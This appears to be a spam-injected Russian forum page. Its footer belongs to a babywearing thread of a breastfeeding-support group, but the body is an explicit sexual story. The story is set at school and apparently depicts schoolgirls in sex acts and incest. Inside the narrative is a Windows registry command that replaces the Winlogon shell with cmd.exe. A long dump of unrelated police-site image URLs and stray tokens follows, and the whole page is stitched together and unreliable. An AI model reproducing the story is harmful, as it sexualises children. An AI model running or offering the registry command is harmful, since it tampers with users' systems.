Удерживая свой член рукой, я принялся играть его головкой с клитором Варьки. Клитор напрягся еще больше, совсем показался наружу, а Варька начала вертеть попкой, стараясь плотнее прижать клитор к моему хую...

Девчата с интересом наблюдали за движениями Варьки, поднимали повыше ее платье, поглаживали по ее попке, рассматривали мой хуй, скользивший вокруг клитора, трогали хуй пальчиками и, наклонившись, пытались лизнуть и прикоснуться к нему губами.

- Варя, - прошептал я ей на ушко, - кто сосет твой клитор?

- Что?

- Клитор... вот этот. Понимаешь?

- А... Ага. Ой...

- Кто его сосет?

- Ну... мой старший брат, - чуть слышно прошептала она.

- Сколько ему?

- Семнадцать уже.

- И ебет тебя?

- Нет.

- Ты не даешь ему?

- Не-е. Он говорит, что нельзя сестру... Ой, ой!

- Приятно?

- Да.

- А ты спускаешь, когда он тебя сосет?

- Да.

- А как же он?

- Он - тоже. Дрочит свой... когда сосет.

- А ты его дрочишь иногда?

- Бывает.

- А у него есть девушка, которую он ебет?

- Есть.

- И ты знаешь, что он ее ебет?

- Он рассказывает мне. И я с ней дружу... И.. и... они при мне... бывает.

- Ебутся?

- Да... Ой!

Скоро мы с Варькой не имели сил шептаться, мы уже задыхались от обоюдной страсти. Варька вертела своей попкой так, что головка хуя все чаще попадала под ее клитор в горячую щелочку. А щелочка все больше и больше раскрывалась...

Девочки тоже притихли, волнуясь. Нюрка, стоя у меня за спиной, жарко целовала меня в шею, Анютка, сидя на корточках позади Варьки, ласкала своим язычком мои яйца. Маринка мяла своими пальчиками пизденку Любки, а Любка целовала шею Варьки.

Обхватив крепко руками попку Варьки, я начал прижимать ее к себе, медленно натягивая ее полураскрытую щелочку на свой вздрагивавший от нестерпимого желания хуй. Варька спрятала головку у меня на груди, судорожно напряглась, изогнулась, охнула раз-другой, и хуй вошел в ее нежное влагалище...

Я вытянулся на стуле, опустив бессильно руки по сторонам, закрыл в упоении глаза и не делал больше никаких движений. Варька сама ебла меня. Ее упругая, проворная попка ни на секунду не прерывала свой сладостный ритм... А потом Варька начала задыхаться, постанывать. Кончали мы как-то самозабвенно, продолжительно, расплескивая последние силы...

Кое-как придя в себя, полностью удовлетворенный и не в меру уставший, я встал, поправил брюки, подготовил к выполнению ещё одну чудесную строчку

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

и затем нажал Ок: "Хочу, чтоб все было по старому, чтоб девочки привели себя в порядок и все забыли, а парни пусть вернутся".

Вскоре все были на своих местах и урок продолжался как ни в чем не бывало.

Стук в дверь разбудил меня. "Так это только сон... не более, как сон", - с грустью подумал я, подымаясь на кровати.

В дверь барабанила соседка Елизавета Алексеевна, и в самом деле, пора в школу.

(c) Смирнов А.В., 07.03.2014

Zehiz

9

Aqovo

https://21.mvd.ru/upload/site24/document_images/yMrpQSm7yV.jpg
https://21.mvd.ru/upload/site24/document_images/zwK0zswku7-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Tiq5yldZbo-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/kMNBj3a8YE-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bIeQzwOu8L-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/iZVCyAZ3EA.jpg
https://21.mvd.ru/upload/site24/document_journal/ENhnonv4Rn-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/8T8EyY6Uxy-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5GQmKdHBeb-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/fWnDr2Z8Dd.jpg
https://21.mvd.ru/upload/site24/document_images/7InDDTZNmD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/AJHEBVwSk2-100xx100.jpg
https://21.mvd.ru/upload/site24/document_manager/Jn55IaFgm9-179xx229.jpg
https://21.mvd.ru/upload/site24/document_images/ADmLxxjw0l-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/xOPojQ8Doh-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/sUQz7FsqVq-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/dEM2j5cjtP-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/saOspAnP2Z-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/izMTt6beF3-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/FJhONRG8uU-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/9RAuDXbSpy-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fS4sPUGIu6-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/wnN23ELe9u.jpg
https://21.mvd.ru/upload/site24/document_images/buB7wdP3f1-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/BwylQPmE3k-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/XACCnfoUQo.jpg
https://21.mvd.ru/upload/site24/document_images/12D4oOe9eX-800x600.jpg
https://21.mvd.ru/upload/site24/document_video/image/Ryeq72RZuD-630xx292.jpg
https://21.mvd.ru/upload/site24/document_remember/JRhwFEbqrp-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/YazcEm2nJk-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/srMoFhoMJs-100xx100.jpg
https://21.mvd.ru/upload/site24/document_video/image/65lgQdOcAC-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/bE5a4ZR97u.jpg
https://21.mvd.ru/upload/site24/document_remember/4GXt5YDJFt-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/lYwub8usGD.jpg
https://21.mvd.ru/upload/site24/document_images/5GQmKdHBeb.jpg
https://21.mvd.ru/upload/site24/document_images/YSoZc2wCs2.jpg
https://21.mvd.ru/upload/site24/document_images/yhohIcHl6y-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5GQmKdHBeb-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/bYLYktTpXm.jpg
https://21.mvd.ru/upload/site24/document_images/VhrmYUhZi8-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/TK6uf2GwRz.jpg
https://21.mvd.ru/upload/site24/document_images/zWoJnm5M27-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/jzpjZPdTyv-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/TaFw4arVbZ.jpg
https://21.mvd.ru/upload/site24/document_images/saOspAnP2Z-188xx140.jpg
https://21.mvd.ru/upload/site24/document_journal/u0GByQ3n1o-308xx423.jpg
https://21.mvd.ru/upload/site24/document_images/sbP77zet0q.jpg
https://21.mvd.ru/upload/site24/document_images/Q9vjViFzhd-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/fWnDr2Z8Dd-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/78GxiMTyXe-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/PYwpshYLc2-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/WyBPr7zeve-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/xOPojQ8Doh.jpg
https://21.mvd.ru/upload/site24/document_images/9SgtK2izJ2.jpg
https://21.mvd.ru/upload/site24/document_images/oRjdOhGVHk-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/yNgGHYCNfC-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/oX893kJWna-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/rJaU1OBgPA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/eqvPk3H4pz-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Jq3EnB7cGA.jpg
https://21.mvd.ru/upload/site24/document_images/3rftbuMszl-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/HsumrTelol.jpg
https://21.mvd.ru/upload/site24/document_images/1jWzD5RE96-800x600.jpg
https://21.mvd.ru/upload/site24/document_journal/C3XrD2iDBp-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/Gn97fwvYTb.jpg
https://21.mvd.ru/upload/site24/document_images/MW1eAQMs45-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/F9e0F8gPXj.jpg
https://21.mvd.ru/upload/site24/document_images/8c8p84R2mg-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/BMExoFRce5-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/JP9rmZlj2A-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/BomAqyL5YT-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/rL7NmdhPdi-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/JGxN0RvLC7-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/6Oz5oRvhrg-800x600.jpg
https://21.mvd.ru/upload/site24/wVJc1nOexZ.png
https://21.mvd.ru/upload/site24/document_images/tMSFH2rLZ4.jpg
https://21.mvd.ru/upload/site24/document_images/nc6NFI7oHZ-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/rJaU1OBgPA-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/m6cwiE3JvV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/owJX1NYfNA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/xCbcyKpGkB.jpg
https://21.mvd.ru/upload/site24/document_images/ockZwoqsgI-305xx210.jpg
https://21.mvd.ru/upload/site24/d13ab61990c983ac86c0dc777b2799ac-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/Vj43qyP9uI.jpg
https://21.mvd.ru/upload/site24/document_images/6hIkaM5zdB.jpg
https://21.mvd.ru/upload/site24/document_images/QJDvuVynWh-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5CfxxNYyVn.jpg
https://21.mvd.ru/upload/site24/document_remember/cAsjeapdH3-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/Ika8wW6qZJ.jpg
https://21.mvd.ru/upload/site24/document_images/mPZUDuOunV-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ubO0D0Wf7n-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/Bhc31ANtiF-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ND8crZ9pvZ.jpg
https://21.mvd.ru/upload/site24/document_images/k0XWdtwfae.jpg
https://21.mvd.ru/upload/site24/document_images/SeOqHYiQVO.jpg
https://21.mvd.ru/upload/site24/document_video/image/OxvLTxBLh2-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/Pvv7QELQMg.jpg
https://21.mvd.ru/upload/site24/document_images/q1Rz9N7dCe.jpg
https://21.mvd.ru/upload/site24/document_images/UTLcAgHESl-800x600.jpg
https://21.mvd.ru/upload/site24/document_news/om4AfnKcyW-300x300.jpg
https://21.mvd.ru/upload/site24/document_images/mZdStATN66-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/pbfrCTm1PV-100xx100.jpg
https://21.mvd.ru/upload/site24/document_video/image/97ldntt9yJ-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/ioQv6KZ50J-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/pbfrCTm1PV.jpg
https://21.mvd.ru/upload/site24/document_images/tpoO3b5bYx-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/DT8XhdLxiw.jpg
https://21.mvd.ru/upload/site24/document_images/zwK0zswku7-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/JKeErALnbD-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/P2pMn4D1PL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zQroGDpJ3m.jpg
https://21.mvd.ru/upload/site24/document_images/zMJXR7qNWC-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ND0Nchw9tV-100xx100.jpg
https://21.mvd.ru/upload/site24/document_manager/icon/UQ2EdvqX4D-88xx88.png
https://21.mvd.ru/upload/site24/document_images/dTW1GRXoLy-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/dTW1GRXoLy.jpg
https://21.mvd.ru/upload/site24/document_images/EB6dxAaNvU.jpg
https://21.mvd.ru/upload/site24/document_images/O4KrispYUt.jpg
https://21.mvd.ru/upload/site24/document_images/bYLYktTpXm-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Bhc31ANtiF-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/ajBOs35gME-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/ND0Nchw9tV.jpg
https://21.mvd.ru/upload/site24/document_remember/aXFCs2FtpH-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/ulZ5njX61P-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/eg73iLxKl8.jpg
https://21.mvd.ru/upload/site24/document_images/I65aiXb7nv-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/6epRi5pIJd.jpg
https://21.mvd.ru/upload/site24/document_images/X9lI1ZQ2ey.jpg
https://21.mvd.ru/upload/site24/document_images/nmY5tbabZM.jpg
https://21.mvd.ru/upload/site24/document_images/8c8p84R2mg.jpg
https://21.mvd.ru/upload/site24/document_images/nIcfVA0uJZ-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/B6mCNwozEg-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7yPiupejRd-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/WIiiECsQxE.jpg
https://21.mvd.ru/upload/site24/MwDcNHb52d-300x150.png
https://21.mvd.ru/upload/site24/document_images/d9B65ffQvz-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/KwzbC6VCMe.jpg
https://21.mvd.ru/upload/site24/document_images/Ika8wW6qZJ-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/isnLSdtrq6-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Vj43qyP9uI-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/1tIRp1MFhu-800x600.jpg
https://21.mvd.ru/upload/site24/FVpOFo9XGd-250x0.jpg
https://21.mvd.ru/upload/site24/document_images/QC3RqMlCjj-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/Y6GsBZF6w6-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/mwgnSVMtiA.jpg

Ixal

Быстрый ответ

Напишите ваше сообщение и нажмите «Отправить»

Вы здесь » Группа Поддержки Естественного Вскармливания в г.Лида » Слингоношение » Основные принципы ношения слинга